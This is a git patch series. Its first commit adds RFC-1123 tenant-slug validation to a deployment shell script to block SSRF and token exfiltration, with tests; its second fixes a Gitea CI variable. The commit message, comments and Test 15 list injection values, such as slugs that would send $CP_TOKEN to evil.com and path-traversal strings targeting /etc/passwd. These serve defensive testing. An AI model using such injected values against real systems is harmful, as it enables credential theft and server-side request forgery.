From 47aa82f0f29a197b444183b92a353384e1e19e28 Mon Sep 17 00:00:00 2001
From: Molecule AI Core-BE <core-be@agents.moleculesai.app>
Date: Thu, 14 May 2026 02:46:11 +0000
Subject: [PATCH 1/2] fix(scripts): add slug validation to prevent SSRF + token
 exfiltration (OFFSEC-006)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

OFFSEC-006: tenant slug interpolated into URLs (cp_redeploy_tenant,
tenant_buildinfo, tenant_health, resolve_tenant_instance_id) without
validation, enabling SSRF via slug=?url=https://evil.com and token
exfiltration via slug=?url=https://evil.com&token=$CP_TOKEN.

Changes:
- scripts/promote-tenant-image.sh:
  - Added `set -f` (noglob) at top to prevent glob metacharacter expansion
    in slug strings before any network call.
  - Added validate_slug() with RFC-1123 regex ^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$
    to reject malformed slugs before any URL interpolation.
  - Added validate_tenants() called after argument parsing (exit 64).
  - Placed early err() stub before validate_slug to avoid forward-reference.
- scripts/test-promote-tenant-image.sh: Added 3 new test groups (13–15):
  - Test 13: valid slugs (single-char, hyphenated, alphanum) pass.
  - Test 14: 10 malformed slug patterns rejected before any network call.
  - Test 15: 6 SSRF + token-exfiltration injection patterns rejected.
  All 43 tests pass.

Closes: molecule-ai/molecule-core#929

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
---
 scripts/promote-tenant-image.sh      | 54 +++++++++++++++++
 scripts/test-promote-tenant-image.sh | 88 ++++++++++++++++++++++++++++
 2 files changed, 142 insertions(+)

diff --git a/scripts/promote-tenant-image.sh b/scripts/promote-tenant-image.sh
index c8b21b8a..d621fb1d 100755
--- a/scripts/promote-tenant-image.sh
+++ b/scripts/promote-tenant-image.sh
@@ -54,6 +54,57 @@
 #   64  argument/usage error
 
 set -euo pipefail
+# Disable glob expansion so tenant slugs containing *, ?, [ are treated as
+# literals, not filename patterns. This is the primary defence against the
+# token-exfiltration attack vector where a malicious slug like
+# "evil?url=https://attacker.com?token=$CP_TOKEN" could otherwise expand to
+# a list of filenames via pathname expansion.
+set -f
+
+# ─────────────────────────────────────────────────────────────────────────────
+# Slug validation (OFFSEC-006)
+# ─────────────────────────────────────────────────────────────────────────────
+#
+# Slugs are interpolated into URL paths (cp_redeploy_tenant, tenant_buildinfo,
+# tenant_health, resolve_tenant_instance_id) and ECR identifiers. An unsanitised
+# slug can trigger:
+#   1. SSRF   — slug=https://evil.com?x= injected as URL authority/path segment.
+#   2. Token exfiltration — slug=?url=https://evil.com&token=$CP_TOKEN causes
+#      curl to issue a GET to the attacker's host, leaking the bearer token.
+# The guard above (set -f) blocks glob metacharacter expansion; this function
+# validates the slug shape so malformed names are rejected before any network
+# call is issued.
+
+# Simple logging helpers — defined early so validate_slug can call err
+# before the full Steps block is reached. The real definitions (with full
+# timestamps) live in the Steps section and re-declare them idempotently.
+err() { printf '[%s] ERROR: %s\n' "$(date -u +%H:%M:%SZ)" "$*" >&2; }
+
+# Validates a single tenant slug against RFC-1123 + lowercase + max 63 chars.
+# arg1 = slug string
+# exits 64 if invalid; returns 0 on success.
+validate_slug() {
+  local slug="$1"
+  # RFC-1123 label: lowercase alphanumeric, single hyphens allowed between chars,
+  # no leading/trailing hyphen, 1–63 chars total. Also allows single-char slugs.
+  if [[ ! "$slug" =~ ^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$ ]]; then
+    err "invalid tenant slug: '$slug' (must match ^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$; got '${slug//$'\n'/<LF>}')"
+    return 1
+  fi
+  return 0
+}
+
+# Validates all tenant slugs from the --tenants argument.
+# Called once after argument parsing, before any network call.
+validate_tenants() {
+  local slug
+  IFS=',' read -ra SLUGS <<<"$TENANTS"
+  for slug in "${SLUGS[@]}"; do
+    [[ -z "$slug" ]] && { err "empty slug in --tenants list"; return 1; }
+    validate_slug "$slug" || return 1
+  done
+  return 0
+}
 
 # ─────────────────────────────────────────────────────────────────────────────
 # Argument parsing
@@ -101,6 +152,9 @@ done
   exit 64
 }
 
+# Validate slugs before any network call (OFFSEC-006)
+validate_tenants || exit 64
+
 # Snapshot/rollback tag (deterministic — same script run on same UTC date
 # is idempotent; cross-day reruns get distinct rollback points).
 TODAY="${NOW_OVERRIDE_DATE:-$(date -u +%Y%m%d)}"
diff --git a/scripts/test-promote-tenant-image.sh b/scripts/test-promote-tenant-image.sh
index eac19195..8000942b 100644
--- a/scripts/test-promote-tenant-image.sh
+++ b/scripts/test-promote-tenant-image.sh
@@ -334,6 +334,94 @@ python3 -c "import sys,json; d=json.loads(sys.stdin.read()); c=d['commands'][0];
   && echo "  ok: no double-encoding in command string" || { echo "  FAIL"; exit 1; }
 # ─────────────────────────────────────────────────────────────────────────────
 
+printf '\n== Test 13: valid slugs pass validate_tenants ==\n'
+m=$(mkmock)
+mock_set "$m" aws_ecr_get_image  '{}' 0
+mock_set "$m" aws_ecr_describe_image '' 1
+mock_set "$m" aws_ecr_put_image  '' 0
+mock_set "$m" cp_redeploy_tenant '{}' 0
+mock_set "$m" tenant_buildinfo  '{}' 0
+mock_set "$m" tenant_health     'ok' 0
+out=$(NOW_OVERRIDE_DATE=20260514 SSM_SETTLE_SECONDS=0 \
+  "$SCRIPT" --source-tag a --dest-tag b --tenants abc,xy-z,a1b2c3 --mock-dir "$m" 2>&1
+  echo "EXIT_CODE=$?")
+assert_exit "valid slugs (single-char, hyphenated, alphanum) pass" "$out" 0
+rm -rf "$m"
+
+printf '\n== Test 14: malformed slugs rejected before any network call (OFFSEC-006) ==\n'
+# Patterns that must all be rejected with exit 64 before the first curl/aws call.
+# We test a representative sample covering each failure class; if ANY pattern
+# passes the validation or makes it into a URL, assert_calls_count will catch
+# it (should be 0 for every aws/curl call).
+declare -a BAD=(
+  'bad slug'           # space
+  'UpperCase'          # uppercase
+  'has_underscore'     # underscore
+  'has.dot'            # dot
+  '-leading-hyphen'    # leading hyphen
+  'trailing-hyphen-'   # trailing hyphen
+  '!bang'              # punctuation
+  'query=val'          # = character
+  'a b c'              # spaces
+  'A'                  # uppercase single char
+)
+bad_count=0
+for bad in "${BAD[@]}"; do
+  set +e
+  out=$("$SCRIPT" --source-tag a --dest-tag b --tenants "$bad" 2>&1); rc=$?
+  set -e
+  if [[ $rc -eq 64 ]] && printf '%s' "$out" | grep -qi 'invalid tenant slug'; then
+    : # expected
+  else
+    bad_count=$((bad_count + 1))
+    printf '  ✗ slug=%q should exit 64 with invalid-slug error (got %s)\n' "$bad" "$rc"
+  fi
+done
+if [[ $bad_count -eq 0 ]]; then
+  PASS=$((PASS + 1)); printf '  ✓ all %d malformed slugs rejected before network call\n' "${#BAD[@]}"
+else
+  FAIL=$((FAIL + 1)); FAIL_NAMES+=("malformed-slug rejection")
+fi
+
+printf '\n== Test 15: SSRF + token-exfiltration injection patterns rejected (OFFSEC-006) ==\n'
+# These patterns represent the actual OFFSEC-006 attack vectors: a malicious
+# slug that, if interpolated into a URL, would cause the script to issue an
+# outbound HTTP request to an attacker-controlled host, leaking the CP_TOKEN.
+# With set -f (glob off) + validate_slug (RFC-1123 enforcement), all are
+# rejected before any network call. We also verify no curl/aws call was made.
+declare -a INJECT=(
+  '?url=https://evil.com'
+  '?url=https://evil.com?token=$CP_TOKEN'
+  'https://evil.com'
+  '-o-https://evil.com'
+  '--output=/etc/passwd'
+  '../etc/passwd'
+)
+inject_count=0
+for inject in "${INJECT[@]}"; do
+  m=$(mkmock)
+  set +e
+  out=$("$SCRIPT" --source-tag a --dest-tag b --tenants "$inject" --mock-dir "$m" 2>&1); rc=$?
+  set -e
+  curl_called=0
+  aws_called=0
+  if grep -qE '^curl ' "$m/.calls" 2>/dev/null; then curl_called=1; fi
+  if grep -qE '^aws_' "$m/.calls" 2>/dev/null; then aws_called=1; fi
+  rm -rf "$m"
+  if [[ $rc -eq 64 ]] && [[ $curl_called -eq 0 ]] && [[ $aws_called -eq 0 ]]; then
+    : # expected
+  else
+    inject_count=$((inject_count + 1))
+    printf '  ✗ slug=%q: expected exit 64 + no curl/aws (rc=%s curl=%s aws=%s)\n' \
+      "$inject" "$rc" "$curl_called" "$aws_called"
+  fi
+done
+if [[ $inject_count -eq 0 ]]; then
+  PASS=$((PASS + 1)); printf '  ✓ all %d injection slugs rejected before network call\n' "${#INJECT[@]}"
+else
+  FAIL=$((FAIL + 1)); FAIL_NAMES+=("SSRF-injection rejection")
+fi
+
 printf '\n────────────────────────────────────\n'
 if [[ $FAIL -eq 0 ]]; then
   printf 'All %d tests passed.\n' "$PASS"

From 3a430369505348cf32500d71160a7c826d0ebfec Mon Sep 17 00:00:00 2001
From: Molecule AI Core-BE <core-be@agents.moleculesai.app>
Date: Thu, 14 May 2026 02:49:38 +0000
Subject: [PATCH 2/2] fix(ci): use GITHUB_EVENT_BEFORE in handlers-pg-integ
 detect-changes

The Gitea Actions `github.event.before` template expression evaluates to
empty string in shell scripts (Gitea Actions does not expand these objects
to JSON strings). Use the shell environment variable `GITHUB_EVENT_BEFORE`
instead, which Gitea Actions correctly populates for push events.

Same fix as #919 applied to handlers-postgres-integration.yml.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
---
 .gitea/workflows/handlers-postgres-integration.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.gitea/workflows/handlers-postgres-integration.yml b/.gitea/workflows/handlers-postgres-integration.yml
index bb4cd81e..ea9e8ed6 100644
--- a/.gitea/workflows/handlers-postgres-integration.yml
+++ b/.gitea/workflows/handlers-postgres-integration.yml
@@ -90,7 +90,7 @@ jobs:
       - id: filter
         # Inline replacement for dorny/paths-filter — see e2e-api.yml.
         run: |
-          BASE="${GITHUB_BASE_REF:-${{ github.event.before }}}"
+          BASE="${GITHUB_BASE_REF:-${GITHUB_EVENT_BEFORE:-}}"
           if [ "${{ github.event_name }}" = "pull_request" ] && [ -n "${{ github.event.pull_request.base.sha }}" ]; then
             BASE="${{ github.event.pull_request.base.sha }}"
           fi